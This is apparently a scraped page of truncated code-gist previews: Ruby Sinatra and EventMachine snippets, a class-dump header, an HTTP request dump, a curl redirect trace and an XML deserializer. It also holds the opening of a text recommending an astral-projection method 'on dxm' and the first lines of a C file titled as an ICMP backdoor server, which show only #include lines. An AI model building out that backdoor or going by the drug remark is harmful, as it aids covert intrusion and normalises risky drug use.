This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require "rubygems" | |
require "sinatra" | |
get '/' do | |
"hi mom!" | |
end | |
trap("INT") { puts 'ITS A TARP!' } | |
Process.kill("INT", Process.pid) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require "rubygems" | |
require "sinatra" | |
get '/' do | |
"hi mom!" | |
end | |
trap("INT") { puts 'ITS A TARP!' } | |
Process.kill("INT", Process.pid) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* Generated by class-dump 3.1.2. | |
* | |
* class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2007 by Steve Nygard. | |
*/ | |
struct CGPoint { | |
float x; | |
float y; | |
}; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require "rubygems" | |
require "eventmachine" | |
@lol = lambda { EM.run { EM.next_tick { p :lol }} } | |
EM.run { | |
EM.add_periodic_timer(1) { @lol.call } | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- | |
[Astral Projection] | |
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- | |
How to have an out of body experience. ph1x. | |
In this article I am going to explain what astral projection is, | |
and my personal method of accomplishing it. | |
NOTE: This method works for me while sober, and on dxm. | |
This method may not work everyone, and is just my |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CAN PEOPLE READ YOUR MIND? | |
-------------------------- | |
Silvio Cesare FOR THE OPPRESSED, | |
[email protected] COMMUNICATION IS THE BEGINNING OF ABOLITION. | |
in IRC | |
channel #freedog, efnet network, nick 'silvio' | |
oz.org network (Australia), nick 'silvio' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* chrak's icmp backdoor server */ | |
#include <stdlib.h> | |
#include <stdio.h> | |
#include <sys/types.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <arpa/inet.h> | |
#include <netinet/in_systm.h> | |
#include <strings.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#<Sinatra::Request:0x19033cc | |
@env= | |
{"SERVER_NAME"=>"0.0.0.0", | |
"HTTP_ACCEPT"=>"*/*", | |
"HTTP_HOST"=>"0.0.0.0:4567", | |
"rack.url_scheme"=>"http", | |
"CONTENT_LENGTH"=>"16", | |
"HTTP_USER_AGENT"=> | |
"curl/7.19.2 (i386-apple-darwin9.6.0) libcurl/7.19.2 OpenSSL/0.9.8i zlib/1.2.3", | |
"REQUEST_PATH"=>"/lol/123", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
~/workspace/kitchen/ curl -v http://tinyurl.com/3za9v | |
* About to connect() to tinyurl.com port 80 (#0) | |
* Trying 195.66.135.140... connected | |
* Connected to tinyurl.com (195.66.135.140) port 80 (#0) | |
> GET /3za9v HTTP/1.1 | |
> User-Agent: curl/7.19.2 (i386-apple-darwin9.6.0) libcurl/7.19.2 OpenSSL/0.9.8i zlib/1.2.3 | |
> Host: tinyurl.com | |
> Accept: */* | |
> | |
< HTTP/1.1 301 Moved Permanently |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def deserialize_xml(response) | |
doc = Hpricot.XML(response) | |
(doc/'items/').each do |elemen| | |
name = elemen.name.gsub(/\-/, '_') | |
if elemen.children.size > 1 | |
stak = [] | |
elemen.children.each {|x| stak.push(x.inner_html) if x.elem? } | |
self.instance_variable_set("@#{name}", stak) | |
else | |
self.instance_variable_set("@#{name}", elemen.inner_html) |